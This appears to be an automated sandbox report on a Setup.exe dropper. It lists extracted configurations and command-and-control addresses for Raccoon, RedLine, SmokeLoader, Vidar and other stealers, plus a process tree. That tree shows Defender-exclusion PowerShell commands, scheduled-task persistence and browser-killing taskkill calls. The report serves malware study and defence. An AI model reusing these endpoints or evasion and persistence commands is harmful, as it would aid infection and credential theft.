Analysis
-
max time kernel
42s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
16-11-2021 10:37
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win10-en-20211104
General
-
Target
Setup.exe
-
Size
312KB
-
MD5
9b85ec9cb71f0e4f684b2a3bb25b2752
-
SHA1
4b6739d0f3fd9af2dccb098ebc9dd1787b378e2b
-
SHA256
f5b3eb889230479909676d757fa8fa735133c28278b1a31e3563ffdd49c3a455
-
SHA512
5257ccae180e3f042047c764396bf435075925861ddb44700e19bf7eefb69decc0f91820a24a3ac38640a83302037d4c9821abed817ec7bb95481fd57eed6866
Malware Config
Extracted
socelars
http://www.gianninidesign.com/
Extracted
raccoon
1.8.3-hotfix
ddf183af4241e3172885cf1b2c4c1fb4ee03d05a
-
url4cnc
http://91.219.236.27/capibar
http://5.181.156.92/capibar
http://91.219.236.207/capibar
http://185.225.19.18/capibar
http://91.219.237.227/capibar
https://t.me/capibar
Extracted
redline
udptest
193.56.146.64:65441
Extracted
metasploit
windows/single_exec
Extracted
redline
15.11_BUILD_1
45.9.20.104:6334
Extracted
smokeloader
2020
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
Extracted
vidar
48.5
937
https://koyu.space/@tttaj
-
profile_id
937
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral2/memory/404-229-0x0000000002220000-0x000000000224E000-memory.dmp family_redline behavioral2/memory/404-235-0x00000000023C0000-0x00000000023EC000-memory.dmp family_redline behavioral2/memory/4876-339-0x0000000000418F0E-mapping.dmp family_redline behavioral2/memory/408-287-0x0000000005AC0000-0x0000000005ADB000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000400000001abf6-150.dat family_socelars behavioral2/files/0x000400000001abf6-151.dat family_socelars -
Arkei Stealer Payload 1 IoCs
resource yara_rule behavioral2/memory/908-254-0x0000000000400000-0x0000000000444000-memory.dmp family_arkei -
Vidar Stealer 3 IoCs
resource yara_rule behavioral2/memory/1536-486-0x0000000002A60000-0x0000000002B35000-memory.dmp family_vidar behavioral2/memory/1536-491-0x0000000000400000-0x00000000027E5000-memory.dmp family_vidar behavioral2/memory/1464-492-0x0000000000400000-0x00000000027E5000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 12 IoCs
pid Process 944 JTFvJod6txvzhYbKnEiSP8sz.exe 4088 _Ff0Vl84aF9Yd1J1kUJXi2nk.exe 3592 bgYLMapV9sU0Jz8kliylwtnd.exe 3692 lyM4QpfYWNberHZ3z5jpsDMW.exe 3536 Vsap8pNvPTbVeeVPfkQQfB9N.exe 1536 UgA8QeFE9_YK23h_VfJ8ibeL.exe 404 3UI1JGMrzfkNs2n2gI0tYUP0.exe 372 z9APPE7_M34diecHzkI3lNJ3.exe 192 TsrAARd8fNIieBS8ClUPrubV.exe 604 77uwz_7AfaBiPpQMCfoIVFfp.exe 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe 408 TBoqWKoCGPISQLPs2AUEM8la.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Control Panel\International\Geo\Nation Setup.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000400000001ac03-171.dat themida behavioral2/files/0x000400000001abfc-165.dat themida behavioral2/memory/1392-211-0x0000000000F20000-0x0000000000F21000-memory.dmp themida behavioral2/files/0x000f00000001ac46-370.dat themida behavioral2/files/0x000400000001ac52-388.dat themida behavioral2/memory/1076-199-0x0000000000950000-0x0000000000951000-memory.dmp themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 ipinfo.io 145 ipinfo.io 147 ipinfo.io 165 ip-api.com 203 ipinfo.io 275 ip-api.com 22 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 12 IoCs
pid pid_target Process procid_target 4092 3692 WerFault.exe 73 1620 3692 WerFault.exe 73 4152 3692 WerFault.exe 73 4556 3692 WerFault.exe 73 3592 3692 WerFault.exe 73 4232 3692 WerFault.exe 73 424 1536 WerFault.exe 70 5592 1464 WerFault.exe 83 4576 6024 WerFault.exe 154 4188 6024 WerFault.exe 154 5176 6024 WerFault.exe 154 5824 6024 WerFault.exe 154 -
NSIS installer 4 IoCs
resource yara_rule behavioral2/files/0x000700000001ac38-264.dat nsis_installer_1 behavioral2/files/0x000700000001ac38-264.dat nsis_installer_2 behavioral2/files/0x000700000001ac38-260.dat nsis_installer_1 behavioral2/files/0x000700000001ac38-260.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4912 schtasks.exe 2236 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1900 timeout.exe -
Kills process with taskkill 3 IoCs
pid Process 1276 taskkill.exe 4540 taskkill.exe 5568 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2580 Setup.exe 2580 Setup.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe 944 JTFvJod6txvzhYbKnEiSP8sz.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeAssignPrimaryTokenPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeLockMemoryPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeIncreaseQuotaPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeMachineAccountPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeTcbPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeSecurityPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeTakeOwnershipPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeLoadDriverPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeSystemProfilePrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeSystemtimePrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeProfSingleProcessPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeIncBasePriorityPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeCreatePagefilePrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeCreatePermanentPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeBackupPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeRestorePrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeShutdownPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeDebugPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeAuditPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeSystemEnvironmentPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeChangeNotifyPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeRemoteShutdownPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeUndockPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeSyncAgentPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeEnableDelegationPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeManageVolumePrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeImpersonatePrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: SeCreateGlobalPrivilege 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: 31 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: 32 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: 33 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: 34 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe Token: 35 1028 yhL1S4zrSEMiPXayoqmoy0dV.exe -
Suspicious use of WriteProcessMemory 56 IoCs
description pid Process procid_target PID 2580 wrote to memory of 944 2580 Setup.exe 69 PID 2580 wrote to memory of 944 2580 Setup.exe 69 PID 2580 wrote to memory of 4088 2580 Setup.exe 75 PID 2580 wrote to memory of 4088 2580 Setup.exe 75 PID 2580 wrote to memory of 4088 2580 Setup.exe 75 PID 2580 wrote to memory of 3592 2580 Setup.exe 74 PID 2580 wrote to memory of 3592 2580 Setup.exe 74 PID 2580 wrote to memory of 3592 2580 Setup.exe 74 PID 2580 wrote to memory of 3692 2580 Setup.exe 73 PID 2580 wrote to memory of 3692 2580 Setup.exe 73 PID 2580 wrote to memory of 3692 2580 Setup.exe 73 PID 2580 wrote to memory of 3536 2580 Setup.exe 72 PID 2580 wrote to memory of 3536 2580 Setup.exe 72 PID 2580 wrote to memory of 3536 2580 Setup.exe 72 PID 2580 wrote to memory of 404 2580 Setup.exe 71 PID 2580 wrote to memory of 404 2580 Setup.exe 71 PID 2580 wrote to memory of 404 2580 Setup.exe 71 PID 2580 wrote to memory of 1536 2580 Setup.exe 70 PID 2580 wrote to memory of 1536 2580 Setup.exe 70 PID 2580 wrote to memory of 1536 2580 Setup.exe 70 PID 2580 wrote to memory of 604 2580 Setup.exe 76 PID 2580 wrote to memory of 604 2580 Setup.exe 76 PID 2580 wrote to memory of 604 2580 Setup.exe 76 PID 2580 wrote to memory of 192 2580 Setup.exe 81 PID 2580 wrote to memory of 192 2580 Setup.exe 81 PID 2580 wrote to memory of 192 2580 Setup.exe 81 PID 2580 wrote to memory of 372 2580 Setup.exe 80 PID 2580 wrote to memory of 372 2580 Setup.exe 80 PID 2580 wrote to memory of 372 2580 Setup.exe 80 PID 2580 wrote to memory of 1028 2580 Setup.exe 79 PID 2580 wrote to memory of 1028 2580 Setup.exe 79 PID 2580 wrote to memory of 1028 2580 Setup.exe 79 PID 2580 wrote to memory of 408 2580 Setup.exe 78 PID 2580 wrote to memory of 408 2580 Setup.exe 78 PID 2580 wrote to memory of 408 2580 Setup.exe 78 PID 2580 wrote to memory of 836 2580 Setup.exe 88 PID 2580 wrote to memory of 836 2580 Setup.exe 88 PID 2580 wrote to memory of 836 2580 Setup.exe 88 PID 2580 wrote to memory of 908 2580 Setup.exe 87 PID 2580 wrote to memory of 908 2580 Setup.exe 87 PID 2580 wrote to memory of 908 2580 Setup.exe 87 PID 2580 wrote to memory of 1076 2580 Setup.exe 86 PID 2580 wrote to memory of 1076 2580 Setup.exe 86 PID 2580 wrote to memory of 1076 2580 Setup.exe 86 PID 2580 wrote to memory of 3968 2580 Setup.exe 85 PID 2580 wrote to memory of 3968 2580 Setup.exe 85 PID 2580 wrote to memory of 3968 2580 Setup.exe 85 PID 2580 wrote to memory of 3876 2580 Setup.exe 84 PID 2580 wrote to memory of 3876 2580 Setup.exe 84 PID 2580 wrote to memory of 3876 2580 Setup.exe 84 PID 2580 wrote to memory of 1464 2580 Setup.exe 83 PID 2580 wrote to memory of 1464 2580 Setup.exe 83 PID 2580 wrote to memory of 1464 2580 Setup.exe 83 PID 2580 wrote to memory of 1392 2580 Setup.exe 82 PID 2580 wrote to memory of 1392 2580 Setup.exe 82 PID 2580 wrote to memory of 1392 2580 Setup.exe 82
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Users\Admin\Pictures\Adobe Films\JTFvJod6txvzhYbKnEiSP8sz.exe"C:\Users\Admin\Pictures\Adobe Films\JTFvJod6txvzhYbKnEiSP8sz.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:944
-
-
C:\Users\Admin\Pictures\Adobe Films\UgA8QeFE9_YK23h_VfJ8ibeL.exe"C:\Users\Admin\Pictures\Adobe Films\UgA8QeFE9_YK23h_VfJ8ibeL.exe"2⤵
- Executes dropped EXE
PID:1536 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1536 -s 17283⤵
- Program crash
PID:424
-
-
-
C:\Users\Admin\Pictures\Adobe Films\3UI1JGMrzfkNs2n2gI0tYUP0.exe"C:\Users\Admin\Pictures\Adobe Films\3UI1JGMrzfkNs2n2gI0tYUP0.exe"2⤵
- Executes dropped EXE
PID:404
-
-
C:\Users\Admin\Pictures\Adobe Films\Vsap8pNvPTbVeeVPfkQQfB9N.exe"C:\Users\Admin\Pictures\Adobe Films\Vsap8pNvPTbVeeVPfkQQfB9N.exe"2⤵
- Executes dropped EXE
PID:3536
-
-
C:\Users\Admin\Pictures\Adobe Films\lyM4QpfYWNberHZ3z5jpsDMW.exe"C:\Users\Admin\Pictures\Adobe Films\lyM4QpfYWNberHZ3z5jpsDMW.exe"2⤵
- Executes dropped EXE
PID:3692 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 6603⤵
- Program crash
PID:4092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 6763⤵
- Program crash
PID:1620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 6843⤵
- Program crash
PID:4152
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 6403⤵
- Program crash
PID:4556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 10163⤵
- Program crash
PID:3592
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 10443⤵
- Program crash
PID:4232
-
-
-
C:\Users\Admin\Pictures\Adobe Films\bgYLMapV9sU0Jz8kliylwtnd.exe"C:\Users\Admin\Pictures\Adobe Films\bgYLMapV9sU0Jz8kliylwtnd.exe"2⤵
- Executes dropped EXE
PID:3592 -
C:\Users\Admin\Documents\sitXDnXtuUg2NIFeNrSDQGFV.exe"C:\Users\Admin\Documents\sitXDnXtuUg2NIFeNrSDQGFV.exe"3⤵PID:3412
-
C:\Users\Admin\Pictures\Adobe Films\RlfQ0sUEKzdCrZUI53vmkLk8.exe"C:\Users\Admin\Pictures\Adobe Films\RlfQ0sUEKzdCrZUI53vmkLk8.exe"4⤵PID:6048
-
-
C:\Users\Admin\Pictures\Adobe Films\zOx6cN8qAtL9WRN4tBPZF0VC.exe"C:\Users\Admin\Pictures\Adobe Films\zOx6cN8qAtL9WRN4tBPZF0VC.exe"4⤵PID:6024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 6525⤵
- Program crash
PID:4576
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 6645⤵
- Program crash
PID:4188
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 7125⤵
- Program crash
PID:5176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 7245⤵
- Program crash
PID:5824
-
-
-
C:\Users\Admin\Pictures\Adobe Films\djh3R4e4NUV1S0pqG2ZUgBw8.exe"C:\Users\Admin\Pictures\Adobe Films\djh3R4e4NUV1S0pqG2ZUgBw8.exe"4⤵PID:6108
-
-
C:\Users\Admin\Pictures\Adobe Films\Kl0O7VNybbBU6N3CQScr_Dn1.exe"C:\Users\Admin\Pictures\Adobe Films\Kl0O7VNybbBU6N3CQScr_Dn1.exe"4⤵PID:6068
-
-
C:\Users\Admin\Pictures\Adobe Films\pCFpQNPgXBIAF_ojNHmvvNUk.exe"C:\Users\Admin\Pictures\Adobe Films\pCFpQNPgXBIAF_ojNHmvvNUk.exe"4⤵PID:6076
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5220
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:4540
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\elQlklS5xTaA5RISnatFZEi0.exe"C:\Users\Admin\Pictures\Adobe Films\elQlklS5xTaA5RISnatFZEi0.exe"4⤵PID:5528
-
-
C:\Users\Admin\Pictures\Adobe Films\FEw1n0E0JzK5T4xOmYa48JGk.exe"C:\Users\Admin\Pictures\Adobe Films\FEw1n0E0JzK5T4xOmYa48JGk.exe"4⤵PID:5192
-
C:\Users\Admin\Pictures\Adobe Films\FEw1n0E0JzK5T4xOmYa48JGk.exe"C:\Users\Admin\Pictures\Adobe Films\FEw1n0E0JzK5T4xOmYa48JGk.exe" -u5⤵PID:5640
-
-
-
C:\Users\Admin\Pictures\Adobe Films\QZ_MmORGRhBH1o4evlyKGdC_.exe"C:\Users\Admin\Pictures\Adobe Films\QZ_MmORGRhBH1o4evlyKGdC_.exe"4⤵PID:5128
-
C:\Users\Admin\AppData\Local\Temp\is-1HRMN.tmp\QZ_MmORGRhBH1o4evlyKGdC_.tmp"C:\Users\Admin\AppData\Local\Temp\is-1HRMN.tmp\QZ_MmORGRhBH1o4evlyKGdC_.tmp" /SL5="$1035C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\QZ_MmORGRhBH1o4evlyKGdC_.exe"5⤵PID:5736
-
C:\Users\Admin\AppData\Local\Temp\is-4PINP.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-4PINP.tmp\lakazet.exe" /S /UID=27096⤵PID:5480
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2236
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_Ff0Vl84aF9Yd1J1kUJXi2nk.exe"C:\Users\Admin\Pictures\Adobe Films\_Ff0Vl84aF9Yd1J1kUJXi2nk.exe"2⤵
- Executes dropped EXE
PID:4088 -
C:\Users\Admin\Pictures\Adobe Films\_Ff0Vl84aF9Yd1J1kUJXi2nk.exe"C:\Users\Admin\Pictures\Adobe Films\_Ff0Vl84aF9Yd1J1kUJXi2nk.exe"3⤵PID:4172
-
-
-
C:\Users\Admin\Pictures\Adobe Films\77uwz_7AfaBiPpQMCfoIVFfp.exe"C:\Users\Admin\Pictures\Adobe Films\77uwz_7AfaBiPpQMCfoIVFfp.exe"2⤵
- Executes dropped EXE
PID:604 -
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"3⤵PID:2064
-
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"3⤵PID:3128
-
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"3⤵PID:3908
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TBoqWKoCGPISQLPs2AUEM8la.exe"C:\Users\Admin\Pictures\Adobe Films\TBoqWKoCGPISQLPs2AUEM8la.exe"2⤵
- Executes dropped EXE
PID:408 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\bunkhouse\svchost.exe" -Force3⤵PID:4080
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\bunkhouse\svchost.exe" -Force3⤵PID:4116
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"3⤵PID:4368
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"3⤵PID:4484
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"3⤵PID:4676
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵PID:4544
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"3⤵PID:4832
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵PID:4876
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\TBoqWKoCGPISQLPs2AUEM8la.exe" -Force3⤵PID:204
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\TBoqWKoCGPISQLPs2AUEM8la.exe" -Force3⤵PID:1304
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yhL1S4zrSEMiPXayoqmoy0dV.exe"C:\Users\Admin\Pictures\Adobe Films\yhL1S4zrSEMiPXayoqmoy0dV.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1028 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:5804
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:5568
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\z9APPE7_M34diecHzkI3lNJ3.exe"C:\Users\Admin\Pictures\Adobe Films\z9APPE7_M34diecHzkI3lNJ3.exe"2⤵
- Executes dropped EXE
PID:372 -
C:\Users\Admin\Pictures\Adobe Films\z9APPE7_M34diecHzkI3lNJ3.exe"C:\Users\Admin\Pictures\Adobe Films\z9APPE7_M34diecHzkI3lNJ3.exe"3⤵PID:1968
-
-
-
C:\Users\Admin\Pictures\Adobe Films\TsrAARd8fNIieBS8ClUPrubV.exe"C:\Users\Admin\Pictures\Adobe Films\TsrAARd8fNIieBS8ClUPrubV.exe"2⤵
- Executes dropped EXE
PID:192
-
-
C:\Users\Admin\Pictures\Adobe Films\bU0MzMvl6LHutIlGECskbFWf.exe"C:\Users\Admin\Pictures\Adobe Films\bU0MzMvl6LHutIlGECskbFWf.exe"2⤵PID:1392
-
-
C:\Users\Admin\Pictures\Adobe Films\qqoKK3TqLg3JBBx3zFEyailY.exe"C:\Users\Admin\Pictures\Adobe Films\qqoKK3TqLg3JBBx3zFEyailY.exe"2⤵PID:1464
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 9203⤵
- Program crash
PID:5592
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LnO_n4UbeXMzytNsEDsIJrdb.exe"C:\Users\Admin\Pictures\Adobe Films\LnO_n4UbeXMzytNsEDsIJrdb.exe"2⤵PID:3876
-
-
C:\Users\Admin\Pictures\Adobe Films\Rj6fy998h7uZaug5nHUXzOf7.exe"C:\Users\Admin\Pictures\Adobe Films\Rj6fy998h7uZaug5nHUXzOf7.exe"2⤵PID:3968
-
C:\Users\Admin\AppData\Roaming\6810146.exe"C:\Users\Admin\AppData\Roaming\6810146.exe"3⤵PID:4864
-
-
C:\Users\Admin\AppData\Roaming\957453.exe"C:\Users\Admin\AppData\Roaming\957453.exe"3⤵PID:4976
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵PID:4304
-
-
-
C:\Users\Admin\AppData\Roaming\6349681.exe"C:\Users\Admin\AppData\Roaming\6349681.exe"3⤵PID:4244
-
-
C:\Users\Admin\AppData\Roaming\5977566.exe"C:\Users\Admin\AppData\Roaming\5977566.exe"3⤵PID:4224
-
-
C:\Users\Admin\AppData\Roaming\6419111.exe"C:\Users\Admin\AppData\Roaming\6419111.exe"3⤵PID:4556
-
-
C:\Users\Admin\AppData\Roaming\8831109.exe"C:\Users\Admin\AppData\Roaming\8831109.exe"3⤵PID:1792
-
C:\Users\Admin\AppData\Roaming\616927.exe"C:\Users\Admin\AppData\Roaming\616927.exe"4⤵PID:520
-
